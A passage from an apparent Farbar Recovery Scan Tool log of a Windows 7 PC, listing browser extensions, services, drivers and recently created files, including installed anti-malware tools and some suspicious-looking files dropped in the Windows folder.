CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [eoepodkgpakekgncgnfnijcippobokhp] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [iadddcofhgaeeniecnhpopipbhijnphj] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [iedokolghlgkcnafplkbjeokfamliokd] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jddmfogomafbmjkfcpfpnjfgecnjffng] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kpmccjcnkhkgcipodalpmbpighkgiaif] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lopcjmbilgeapfldddijpgpahphngjdk] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mhgliccaogcekoldfmachhehepjdfobj] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nfkbfmjkmioenefhjdonleflegoephgm] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pedogdjgmjlabbbdhokgdafpglnjinhc] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\Exts\Chrome.crx [2015-06-08]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 BrcmMgmtAgent; C:\Program Files\Broadcom\MgmtAgent\BrcmMgmtAgent.exe [158720 2010-06-29] (Broadcom Corporation) [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1394816 2015-05-01] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1772672 2015-05-01] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2736824 2015-04-07] (Microsoft Corporation)
R2 FileZilla Server; C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe [630272 2011-06-07] (FileZilla Project) [File not signed]
R2 HitmanProScheduler; C:\Program Files\HitmanPro\hmpsched.exe [127752 2015-05-27] (SurfRight B.V.)
R2 MbaeSvc; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe [656184 2015-04-08] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-04-14] (Malwarebytes Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe [288776 2013-09-06] (McAfee, Inc.)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL11.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [191064 2012-02-11] (Microsoft Corporation)
R2 N360; C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\N360.exe [265000 2015-03-26] (Symantec Corporation)
R2 O2FLASH; C:\Windows\system32\o2flash.exe [244328 2011-11-16] (O2Micro International)
R2 O2SDIOAssist; c:\Windows\SysWOW64\srvany.exe [8192 2003-04-18] () [File not signed]
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [1931632 2015-04-19] (Electronic Arts)
S3 SecureStorageService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Secure Storage Manager\SecureStorageService.exe [2117120 2010-11-03] (Wave Systems Corp.) [File not signed]
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL11.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [597080 2012-02-11] (Microsoft Corporation)
S2 svcGenericHost; c:\Program Files (x86)\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe [45056 2010-07-05] (Trend Micro Inc.) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S2 tcsd_win32.exe; C:\Program Files (x86)\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1629696 2010-07-13] () [File not signed]
R2 VMAuthdService; C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe [79872 2012-06-09] (VMware, Inc.) [File not signed]
R2 W3SVC; C:\Windows\system32\inetsrv\iisw3adm.dll [453120 2010-11-20] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZcfgSvc7; C:\Program Files\Intel\WiFi\bin\ZCfgSvc7.exe [992256 2010-12-23] (Intel® Corporation) [File not signed]
S2 HandsFree Client; C:\Program Files (x86)\HandsFree\Client\srvc.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 BHDrvx64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\BASHDefs\20150601.001\BHDrvx64.sys [1640152 2015-06-01] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1507000.00B\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [489776 2015-06-07] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [145200 2015-06-07] (Symantec Corporation)
R1 ESProtectionDriver; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.sys [63064 2015-04-08] ()
R1 IDSVia64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\IPSDefs\20150605.001\IDSvia64.sys [684248 2015-06-05] (Symantec Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-04-14] (Malwarebytes Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [136408 2015-06-06] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-04-14] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20150607.020\ENG64.SYS [129752 2015-06-07] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20150607.020\EX64.SYS [2137304 2015-06-07] (Symantec Corporation)
S4 RsFx0200; C:\Windows\System32\DRIVERS\RsFx0200.sys [334936 2012-02-11] (Microsoft Corporation)
R3 SRTSP; C:\Windows\System32\Drivers\N360x64\1507000.00B\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1507000.00B\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1507000.00B\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1507000.00B\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2015-06-07] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1507000.00B\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1507000.00B\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)
R2 VMparport; C:\Windows\system32\drivers\VMparport.sys [31384 2012-06-09] (VMware, Inc.)
S3 cpuz134; \??\C:\Users\DELL2~1\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-08 12:56 - 2015-06-08 12:57 - 00032537 _____ C:\Users\dell 2\Downloads\FRST.txt
2015-06-08 12:56 - 2015-06-08 12:57 - 00000000 ____D C:\FRST
2015-06-08 12:55 - 2015-06-08 12:55 - 02108928 _____ (Farbar) C:\Users\dell 2\Downloads\FRST64.exe
2015-06-08 04:31 - 2015-06-08 04:31 - 00000000 ____D C:\Windows\System32\Tasks\Norton Security Suite
2015-06-08 03:57 - 2015-06-08 04:18 - 00000000 ____D C:\Users\dell 2\AppData\Local\NPE
2015-06-08 03:36 - 2015-06-08 03:36 - 00001063 _____ C:\Users\dell 2\Desktop\JRT.txt
2015-06-08 01:41 - 2015-06-08 01:41 - 00000000 ____D C:\N360_BACKUP
2015-06-08 01:11 - 2015-05-22 14:18 - 01021440 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2015-06-08 01:11 - 2015-05-22 14:18 - 00757248 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2015-06-08 01:11 - 2015-05-22 14:18 - 00700416 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2015-06-08 01:11 - 2015-05-22 14:18 - 00423424 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2015-06-08 01:11 - 2015-05-22 14:18 - 00227328 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2015-06-08 01:11 - 2015-05-22 14:18 - 00045568 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2015-06-08 01:11 - 2015-05-22 14:13 - 01119232 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-06-08 01:11 - 2015-05-21 09:19 - 00193536 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2015-06-07 16:52 - 2015-06-08 04:25 - 00003228 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2015-06-07 16:52 - 2015-06-08 04:25 - 00002442 _____ C:\Users\Public\Desktop\Norton Security Suite.lnk
2015-06-07 16:52 - 2015-06-07 16:52 - 00177752 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
2015-06-07 16:52 - 2015-06-07 16:52 - 00008222 _____ C:\Windows\system32\Drivers\SYMEVENT64x86.CAT
2015-06-07 16:52 - 2015-06-07 16:52 - 00000000 ____D C:\Program Files\Common Files\Symantec Shared
2015-06-07 16:51 - 2015-06-08 04:26 - 00000000 ____D C:\Windows\system32\Drivers\N360x64
2015-06-07 16:51 - 2015-06-08 04:25 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security Suite
2015-06-07 16:51 - 2015-06-07 16:51 - 00000000 ____D C:\Program Files (x86)\Norton Security Suite
2015-06-07 16:41 - 2015-06-08 02:00 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2015-06-07 16:41 - 2015-06-07 16:41 - 01021632 _____ (Symantec Corporation) C:\Users\dell 2\Downloads\Norton_Download_Manager (1).exe
2015-06-07 13:36 - 2015-06-07 13:36 - 05628238 _____ (Swearware) C:\Users\dell 2\Downloads\ComboFix.exe
2015-06-07 03:53 - 2015-06-07 03:53 - 00002261 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-06-07 03:53 - 2015-06-07 03:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-06-07 03:52 - 2015-06-07 04:23 - 06103040 _____ C:\Program Files (x86)\GUT9627.tmp
2015-06-07 03:52 - 2015-06-07 03:52 - 00000000 ____D C:\Program Files (x86)\GUM9626.tmp
2015-06-06 20:08 - 2015-06-06 20:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Exploit
2015-06-06 20:07 - 2015-06-08 12:45 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Exploit
2015-06-06 20:07 - 2015-06-08 12:25 - 00000000 ____D C:\ProgramData\Malwarebytes Anti-Exploit
2015-06-06 19:51 - 2015-06-06 19:51 - 00002984 _____ C:\Windows\System32\Tasks\{0A48383E-28B8-4E3F-9733-DE0573B61731}
2015-06-06 14:10 - 2015-06-06 14:10 - 01391104 _____ C:\Users\dell 2\Downloads\apploc.msi
2015-06-06 02:40 - 2015-06-06 02:40 - 00000000 __SHD C:\found.000
2015-06-06 00:26 - 2015-06-06 00:27 - 00039196 _____ C:\Users\dell 2\Downloads\software_removal_tool.log
2015-06-06 00:26 - 2015-06-06 00:27 - 00000312 _____ C:\Windows\Tasks\Software Removal Tool logs upload retry.job
2015-06-06 00:26 - 2015-06-06 00:26 - 04715848 _____ (Google) C:\Users\dell 2\Downloads\software_removal_tool.exe
2015-06-06 00:26 - 2015-06-06 00:26 - 00000098 _____ C:\Users\dell 2\Downloads\debug.log
2015-06-05 23:30 - 2015-06-05 23:30 - 00046823 _____ C:\Users\dell 2\Desktop\Result.txt
2015-06-05 21:23 - 2015-06-07 03:53 - 00000000 ____D C:\Users\dell 2\AppData\Local\Google
2015-06-05 02:28 - 2015-06-05 02:28 - 00002165 _____ C:\Users\dell 2\Desktop\Tweaking.com - Windows Repair.lnk
2015-06-05 02:28 - 2015-06-05 02:28 - 00000574 _____ C:\Windows\Tasks\Tweaking.com - Windows Repair Tray Icon.job
2015-06-05 02:28 - 2015-06-05 02:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2015-06-05 02:28 - 2015-06-05 02:28 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
2015-06-05 02:27 - 2015-06-08 03:38 - 00000000 ____D C:\AdwCleaner
2015-06-05 02:27 - 2015-06-05 02:27 - 12881704 _____ C:\Users\dell 2\Downloads\tweaking.com_windows_repair_aio_setup.exe
2015-06-05 02:26 - 2015-06-05 02:27 - 02231296 _____ C:\Users\dell 2\Downloads\adwcleaner_4.206.exe
2015-06-05 01:55 - 2015-06-05 01:55 - 02942610 _____ (Thisisu) C:\Users\dell 2\Downloads\JRT.exe
2015-06-05 01:55 - 2015-06-05 01:55 - 00000207 _____ C:\Windows\tweaking.com-regbackup-SEVILLE-Windows-7-Professional-(64-bit).dat
2015-06-05 01:55 - 2015-06-05 01:55 - 00000000 ____D C:\RegBackup
2015-06-05 01:08 - 2015-06-05 09:32 - 00000000 ____D C:\Users\dell 2\Desktop\Old Firefox Data
2015-06-05 00:42 - 2015-06-05 00:42 - 00000000 __SHD C:\Users\dell 2\AppData\Local\EmieUserList
2015-06-05 00:42 - 2015-06-05 00:42 - 00000000 __SHD C:\Users\dell 2\AppData\Local\EmieSiteList
2015-06-05 00:42 - 2015-06-05 00:42 - 00000000 __SHD C:\Users\dell 2\AppData\Local\EmieBrowserModeList
2015-06-05 00:12 - 2015-06-05 00:12 - 00009928 _____ C:\Windows\system32\.crusader
2015-06-04 20:14 - 2015-06-04 20:14 - 00000017 _____ C:\Windows\SysWOW64\shortcut_ex.dat
2015-06-04 20:10 - 2015-06-04 20:10 - 00000000 ____D C:\Windows\pss
2015-06-02 11:31 - 2015-06-02 11:31 - 00049208 _____ C:\Users\dell 2\Downloads\Star.bmp
2015-05-31 22:16 - 2015-05-31 22:27 - 00000000 ____D C:\Users\dell 2\Downloads\Artificial Academy 2
2015-05-31 21:42 - 2015-06-06 21:07 - 00000000 ____D C:\illusion
2015-05-31 19:32 - 2015-05-31 19:32 - 00000000 ____D C:\Windows\Lists
2015-05-31 19:32 - 2015-04-25 05:18 - 00295424 _____ (Groom-A-Zebu ™ ) C:\Windows\system32\ysxja.exe
2015-05-31 19:32 - 2015-04-25 05:18 - 00295424 _____ (Groom-A-Zebu ™ ) C:\Windows\cygavb.exe
2015-05-31 19:32 - 2015-04-25 05:18 - 00053248 _____ C:\Windows\zlib.dll
2015-05-31 19:32 - 2013-12-05 07:36 - 00003542 _____ C:\Windows\mstdcvtr.bat
2015-05-31 19:32 - 2013-06-05 08:38 - 00004122 _____ C:\Windows\plofgye
2015-05-31 19:32 - 2013-06-05 08:37 - 00004194 _____ C:\Windows\soxe
2015-05-31 19:32 - 2013-06-05 08:36 - 00000038 _____ C:\Windows\initcvtr.bat
2015-05-31 19:32 - 2013-01-06 07:43 - 00000074 _____ C:\Windows\system32\Drivers\healusb.sys
2015-05-31 19:32 - 2013-01-06 07:43 - 00000074 _____ C:\Windows\system32\cygwin.sys
2015-05-31 19:32 - 2012-12-17 07:45 - 00018559 _____ C:\Windows\default.cfg
2015-05-31 19:32 - 2012-07-09 11:02 - 00279552 _____ (Eric Lawrence) C:\Windows\FiddlerCore4.dll
2015-05-31 19:30 - 2015-05-31 19:30 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\DAEMON Tools Lite
2015-05-31 19:29 - 2015-05-31 19:29 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2015-05-31 18:29 - 2015-05-31 18:29 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\WinRAR
2015-05-31 17:37 - 2015-05-31 17:37 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\PowerISO
2015-05-31 17:26 - 2015-05-31 17:26 - 00000987 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2015-05-31 17:26 - 2015-05-31 17:26 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2015-05-31 17:26 - 2015-05-31 17:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2015-05-31 17:26 - 2015-05-31 17:26 - 00000000 ____D C:\Program Files\WinRAR
2015-05-31 17:25 - 2015-05-31 17:25 - 01941744 _____ C:\Users\dell 2\Downloads\winrar-x64-521.exe
2015-05-31 17:22 - 2015-05-31 17:22 - 00000814 _____ C:\Users\Public\Desktop\PowerISO.lnk
2015-05-31 17:22 - 2015-05-31 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO
2015-05-31 17:22 - 2015-05-31 17:22 - 00000000 ____D C:\Program Files\PowerISO
2015-05-31 17:22 - 2015-04-07 22:01 - 00127760 _____ (Power Software Ltd) C:\Windows\system32\Drivers\scdemu.sys
2015-05-31 17:19 - 2015-05-31 17:20 - 03097024 _____ (Power Software Ltd) C:\Users\dell 2\Downloads\PowerISO6-x64.exe
2015-05-31 17:18 - 2015-06-05 13:03 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\BitTorrent
2015-05-30 13:03 - 2015-05-30 13:03 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\dlg
2015-05-30 12:57 - 2015-06-06 22:15 - 00136408 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-05-30 12:57 - 2015-05-30 12:57 - 00001108 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-05-30 12:57 - 2015-05-30 12:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-05-30 12:57 - 2015-05-30 12:57 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-05-30 12:57 - 2015-04-14 09:37 - 00107736 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-05-30 12:57 - 2015-04-14 09:37 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-05-30 12:57 - 2015-04-14 09:37 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-05-30 12:54 - 2015-05-30 12:54 - 21546080 _____ (Malwarebytes Corporation ) C:\Users\dell 2\Downloads\mbam-setup-2.1.6.1022.exe
2015-05-28 11:53 - 2015-05-28 11:57 - 00000000 ____D C:\Users\dell 2\AppData\Local\WinZip
2015-05-28 11:53 - 2015-05-28 11:55 - 00000000 ____D C:\ProgramData\WinZip
2015-05-28 11:53 - 2015-05-28 11:53 - 00002289 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
2015-05-28 11:53 - 2015-05-28 11:53 - 00002283 _____ C:\Users\Public\Desktop\WinZip.lnk
2015-05-28 11:53 - 2015-05-28 11:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2015-05-28 11:53 - 2015-05-28 11:53 - 00000000 ____D C:\Program Files\WinZip
2015-05-28 11:52 - 2015-05-28 11:52 - 00000000 ____D C:\ProgramData\UniqueId
2015-05-28 11:51 - 2015-05-28 11:51 - 00714376 _____ (WinZip Computing, S.L.) C:\Users\dell 2\Downloads\winzip19-new.exe
2015-05-27 12:05 - 2015-05-27 12:05 - 00001899 _____ C:\Users\Public\Desktop\HitmanPro.lnk
2015-05-27 12:05 - 2015-05-27 12:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro
2015-05-27 12:05 - 2015-05-27 12:05 - 00000000 ____D C:\Program Files\HitmanPro
2015-05-27 12:04 - 2015-05-27 12:04 - 11024496 _____ (SurfRight B.V.) C:\Users\dell 2\Downloads\HitmanPro_x64.exe
2015-05-27 11:51 - 2015-05-27 11:51 - 51789024 _____ (Microsoft Corporation) C:\Users\dell 2\Downloads\Windows-KB890830-x64-V5.24.exe
2015-05-13 03:04 - 2015-05-01 09:17 - 00124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-05-13 03:04 - 2015-05-01 09:16 - 00102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-05-12 18:27 - 2015-02-18 03:06 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2015-05-12 18:27 - 2015-02-18 03:04 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2015-05-12 18:26 - 2015-05-04 21:29 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-05-12 18:26 - 2015-05-04 21:12 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2015-05-12 18:26 - 2015-04-27 15:28 - 05569984 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-05-12 18:26 - 2015-04-27 15:28 - 00155584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-05-12 18:26 - 2015-04-27 15:28 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-05-12 18:26 - 2015-04-27 15:26 - 01728960 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 01461760 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 01254400 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 01162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00113664 _____ (Microsoft Corporation) C:\Windows\system32\sechost.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2015-05-12 18:26 - 2015-04-27 15:22 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\tracerpt.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00104448 _____ (Microsoft Corporation) C:\Windows\system32\logman.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\typeperf.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\relog.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\diskperf.exe
2015-05-12 18:26 - 2015-04-27 15:21 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-05-12 18:26 - 2015-04-27 15:16 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004608 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004608 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
